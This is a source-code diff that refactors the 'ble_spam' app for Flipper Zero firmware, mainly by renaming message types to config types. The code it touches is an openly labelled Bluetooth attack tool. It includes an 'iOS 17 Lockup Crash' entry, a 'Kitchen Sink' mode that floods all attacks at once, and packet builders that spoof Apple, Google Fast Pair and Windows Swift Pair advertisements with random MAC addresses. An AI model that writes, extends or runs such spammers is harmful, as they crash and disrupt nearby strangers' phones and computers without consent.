diff --git a/applications/external/ble_spam/ble_spam.c b/applications/external/ble_spam/ble_spam.c index e0af2bfdd..ce6aabe28 100644 --- a/applications/external/ble_spam/ble_spam.c +++ b/applications/external/ble_spam/ble_spam.c @@ -11,37 +11,32 @@ // Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576 // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam -typedef struct { - bool random_mac; - const BleSpamProtocol* protocol; - BleSpamMsg msg; -} Payload; - typedef struct { const char* title; const char* text; - Payload payload; + const BleSpamProtocol* protocol; + BleSpamPayload payload; } Attack; static Attack attacks[] = { { .title = "+ Kitchen Sink", .text = "Flood all attacks at once", + .protocol = NULL, .payload = { .random_mac = true, - .protocol = NULL, - .msg = {}, + .cfg = {}, }, }, { .title = "iOS 17 Lockup Crash", .text = "Newer iPhones, long range", + .protocol = &ble_spam_protocol_continuity, .payload = { .random_mac = false, - .protocol = &ble_spam_protocol_continuity, - .msg = + .cfg = { .continuity = { @@ -54,11 +49,11 @@ static Attack attacks[] = { { .title = "Apple Action Modal", .text = "Lock cooldown, long range", + .protocol = &ble_spam_protocol_continuity, .payload = { .random_mac = false, - .protocol = &ble_spam_protocol_continuity, - .msg = + .cfg = { .continuity = { @@ -71,11 +66,11 @@ static Attack attacks[] = { { .title = "Apple Device Popup", .text = "No cooldown, close range", + .protocol = &ble_spam_protocol_continuity, .payload = { .random_mac = false, - .protocol = &ble_spam_protocol_continuity, - .msg = + .cfg = { .continuity = { @@ -88,11 +83,11 @@ static Attack attacks[] = { { .title = "Android Device Pair", .text = "Reboot cooldown, long range", + .protocol = &ble_spam_protocol_fastpair, .payload = { .random_mac = true, - .protocol = &ble_spam_protocol_fastpair, - .msg = + .cfg = { .fastpair = {}, }, @@ -101,11 +96,11 @@ static Attack attacks[] = { { .title = "Windows Device Found", .text = "Requires enabling SwiftPair", + .protocol = &ble_spam_protocol_swiftpair, .payload = { .random_mac = true, - .protocol = &ble_spam_protocol_swiftpair, - .msg = + .cfg = { .swiftpair = {}, }, @@ -131,12 +126,13 @@ static int32_t adv_thread(void* ctx) { uint16_t delay; uint8_t* packet; uint8_t mac[GAP_MAC_ADDR_SIZE]; - Payload* payload = &attacks[state->index].payload; + BleSpamPayload* payload = &attacks[state->index].payload; + const BleSpamProtocol* protocol = attacks[state->index].protocol; if(!payload->random_mac) furi_hal_random_fill_buf(mac, sizeof(mac)); while(state->advertising) { - if(payload->protocol) { - payload->protocol->make_packet(&size, &packet, &payload->msg); + if(protocol) { + protocol->make_packet(&size, &packet, &payload->cfg); } else { ble_spam_protocols[rand() % ble_spam_protocols_count]->make_packet( &size, &packet, NULL); @@ -200,8 +196,8 @@ static void draw_callback(Canvas* canvas, void* ctx) { const Attack* attack = (state->index >= 0 && state->index <= ATTACK_COUNT - 1) ? &attacks[state->index] : NULL; - const Payload* payload = &attack->payload; - const BleSpamProtocol* protocol = (attack && payload->protocol) ? payload->protocol : NULL; + const BleSpamPayload* payload = &attack->payload; + const BleSpamProtocol* protocol = attack->protocol; canvas_set_font(canvas, FontSecondary); canvas_draw_icon(canvas, 4, 3, protocol ? protocol->icon : &I_ble); @@ -290,7 +286,7 @@ static void draw_callback(Canvas* canvas, void* ctx) { "%02i/%02i: %s", state->index + 1, ATTACK_COUNT, - protocol ? protocol->get_name(&payload->msg) : "Everything"); + protocol ? protocol->get_name(&payload->cfg) : "Everything"); canvas_draw_str(canvas, 4 - (state->index < 19 ? 1 : 0), 21, str); canvas_set_font(canvas, FontPrimary); diff --git a/applications/external/ble_spam/protocols/_base.h b/applications/external/ble_spam/protocols/_base.h index d3fbe98ff..fb59ee5b5 100644 --- a/applications/external/ble_spam/protocols/_base.h +++ b/applications/external/ble_spam/protocols/_base.h @@ -8,10 +8,10 @@ #include #include -typedef union BleSpamMsg BleSpamMsg; +typedef union BleSpamProtocolCfg BleSpamProtocolCfg; typedef struct { const Icon* icon; - const char* (*get_name)(const BleSpamMsg* _msg); - void (*make_packet)(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg); + const char* (*get_name)(const BleSpamProtocolCfg* _cfg); + void (*make_packet)(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg); } BleSpamProtocol; diff --git a/applications/external/ble_spam/protocols/_registry.h b/applications/external/ble_spam/protocols/_registry.h index 69070c356..cca571a5b 100644 --- a/applications/external/ble_spam/protocols/_registry.h +++ b/applications/external/ble_spam/protocols/_registry.h @@ -4,12 +4,17 @@ #include "fastpair.h" #include "swiftpair.h" -union BleSpamMsg { - ContinuityMsg continuity; - FastpairMsg fastpair; - SwiftpairMsg swiftpair; +union BleSpamProtocolCfg { + ContinuityCfg continuity; + FastpairCfg fastpair; + SwiftpairCfg swiftpair; }; extern const BleSpamProtocol* ble_spam_protocols[]; extern const size_t ble_spam_protocols_count; + +typedef struct { + bool random_mac; + BleSpamProtocolCfg cfg; +} BleSpamPayload; diff --git a/applications/external/ble_spam/protocols/continuity.c b/applications/external/ble_spam/protocols/continuity.c index ac0a2aa00..b52f45a5f 100644 --- a/applications/external/ble_spam/protocols/continuity.c +++ b/applications/external/ble_spam/protocols/continuity.c @@ -16,9 +16,9 @@ static const char* type_names[ContinuityTypeCount] = { [ContinuityTypeNearbyInfo] = "Nearby Info", [ContinuityTypeCustomCrash] = "Custom Packet", }; -const char* continuity_get_name(const BleSpamMsg* _msg) { - const ContinuityMsg* msg = &_msg->continuity; - return type_names[msg->type]; +const char* continuity_get_name(const BleSpamProtocolCfg* _cfg) { + const ContinuityCfg* cfg = &_cfg->continuity; + return type_names[cfg->type]; } #define HEADER_LEN (6) // 1 Size + 1 AD Type + 2 Company ID + 1 Continuity Type + 1 Continuity Size @@ -33,12 +33,12 @@ static uint8_t packet_sizes[ContinuityTypeCount] = { [ContinuityTypeCustomCrash] = HEADER_LEN + 11, }; -void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) { - const ContinuityMsg* msg = _msg ? &_msg->continuity : NULL; +void continuity_make_packet(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg) { + const ContinuityCfg* cfg = _cfg ? &_cfg->continuity : NULL; ContinuityType type; - if(msg) { - type = msg->type; + if(cfg) { + type = cfg->type; } else { const ContinuityType types[] = { ContinuityTypeProximityPair, @@ -85,8 +85,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp case ContinuityTypeProximityPair: { uint16_t model; - if(msg && msg->data.proximity_pair.model != 0x0000) { - model = msg->data.proximity_pair.model; + if(cfg && cfg->data.proximity_pair.model != 0x0000) { + model = cfg->data.proximity_pair.model; } else { const uint16_t models[] = { 0x0E20, // AirPods Pro @@ -113,8 +113,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp } uint8_t prefix; - if(msg && msg->data.proximity_pair.prefix == 0x00) { - prefix = msg->data.proximity_pair.prefix; + if(cfg && cfg->data.proximity_pair.prefix == 0x00) { + prefix = cfg->data.proximity_pair.prefix; } else { if(model == 0x0055 || model == 0x0030) prefix = 0x05; @@ -176,8 +176,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp case ContinuityTypeNearbyAction: { uint8_t action; - if(msg && msg->data.nearby_action.type != 0x00) { - action = msg->data.nearby_action.type; + if(cfg && cfg->data.nearby_action.type != 0x00) { + action = cfg->data.nearby_action.type; } else { const uint8_t actions[] = { 0x13, // AppleTV AutoFill @@ -197,8 +197,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp } uint8_t flag; - if(msg && msg->data.nearby_action.flags != 0x00) { - flag = msg->data.nearby_action.flags; + if(cfg && cfg->data.nearby_action.flags != 0x00) { + flag = cfg->data.nearby_action.flags; } else { flag = 0xC0; if(action == 0x20 && rand() % 2) flag--; // More spam for 'Join This AppleTV?' @@ -265,8 +265,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp break; } - *out_size = size; - *out_packet = packet; + *_size = size; + *_packet = packet; } const BleSpamProtocol ble_spam_protocol_continuity = { diff --git a/applications/external/ble_spam/protocols/continuity.h b/applications/external/ble_spam/protocols/continuity.h index 7e97f8425..e40d3525e 100644 --- a/applications/external/ble_spam/protocols/continuity.h +++ b/applications/external/ble_spam/protocols/continuity.h @@ -31,6 +31,6 @@ typedef struct { uint8_t type; } nearby_action; } data; -} ContinuityMsg; +} ContinuityCfg; extern const BleSpamProtocol ble_spam_protocol_continuity; diff --git a/applications/external/ble_spam/protocols/fastpair.c b/applications/external/ble_spam/protocols/fastpair.c index 8f329492e..1c06f68e6 100644 --- a/applications/external/ble_spam/protocols/fastpair.c +++ b/applications/external/ble_spam/protocols/fastpair.c @@ -4,18 +4,18 @@ // Hacked together by @Willy-JL and @Spooks4576 // Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction -const char* fastpair_get_name(const BleSpamMsg* _msg) { - const FastpairMsg* msg = &_msg->fastpair; - UNUSED(msg); +const char* fastpair_get_name(const BleSpamProtocolCfg* _cfg) { + const FastpairCfg* cfg = &_cfg->fastpair; + UNUSED(cfg); return "FastPair"; } -void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) { - const FastpairMsg* msg = _msg ? &_msg->fastpair : NULL; +void fastpair_make_packet(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg) { + const FastpairCfg* cfg = _cfg ? &_cfg->fastpair : NULL; uint32_t model_id; - if(msg && msg->model_id != 0x000000) { - model_id = msg->model_id; + if(cfg && cfg->model_id != 0x000000) { + model_id = cfg->model_id; } else { const uint32_t models[] = { // Genuine devices @@ -57,8 +57,8 @@ void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpam packet[i++] = 0x0A; // AD Type (Tx Power Level) packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm - *out_size = size; - *out_packet = packet; + *_size = size; + *_packet = packet; } const BleSpamProtocol ble_spam_protocol_fastpair = { diff --git a/applications/external/ble_spam/protocols/fastpair.h b/applications/external/ble_spam/protocols/fastpair.h index 6555d0b6b..46162fbc5 100644 --- a/applications/external/ble_spam/protocols/fastpair.h +++ b/applications/external/ble_spam/protocols/fastpair.h @@ -6,6 +6,6 @@ typedef struct { uint32_t model_id; -} FastpairMsg; +} FastpairCfg; extern const BleSpamProtocol ble_spam_protocol_fastpair; diff --git a/applications/external/ble_spam/protocols/swiftpair.c b/applications/external/ble_spam/protocols/swiftpair.c index 26ea203e4..60d8808d4 100644 --- a/applications/external/ble_spam/protocols/swiftpair.c +++ b/applications/external/ble_spam/protocols/swiftpair.c @@ -4,18 +4,18 @@ // Hacked together by @Willy-JL and @Spooks4576 // Documentation at https://learn.microsoft.com/en-us/windows-hardware/design/component-guidelines/bluetooth-swift-pair -const char* swiftpair_get_name(const BleSpamMsg* _msg) { - const SwiftpairMsg* msg = &_msg->swiftpair; - UNUSED(msg); +const char* swiftpair_get_name(const BleSpamProtocolCfg* _cfg) { + const SwiftpairCfg* cfg = &_cfg->swiftpair; + UNUSED(cfg); return "SwiftPair"; } -void swiftpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) { - const SwiftpairMsg* msg = _msg ? &_msg->swiftpair : NULL; +void swiftpair_make_packet(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg) { + const SwiftpairCfg* cfg = _cfg ? &_cfg->swiftpair : NULL; const char* display_name; - if(msg && msg->display_name[0] != '\0') { - display_name = msg->display_name; + if(cfg && cfg->display_name[0] != '\0') { + display_name = cfg->display_name; } else { const char* names[] = { "Assquach💦", @@ -43,8 +43,8 @@ void swiftpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpa memcpy(&packet[i], display_name, display_name_len); // Display Name i += display_name_len; - *out_size = size; - *out_packet = packet; + *_size = size; + *_packet = packet; } const BleSpamProtocol ble_spam_protocol_swiftpair = { diff --git a/applications/external/ble_spam/protocols/swiftpair.h b/applications/external/ble_spam/protocols/swiftpair.h index 5ded8ebf8..c3ef21540 100644 --- a/applications/external/ble_spam/protocols/swiftpair.h +++ b/applications/external/ble_spam/protocols/swiftpair.h @@ -6,6 +6,6 @@ typedef struct { char display_name[25]; -} SwiftpairMsg; +} SwiftpairCfg; extern const BleSpamProtocol ble_spam_protocol_swiftpair;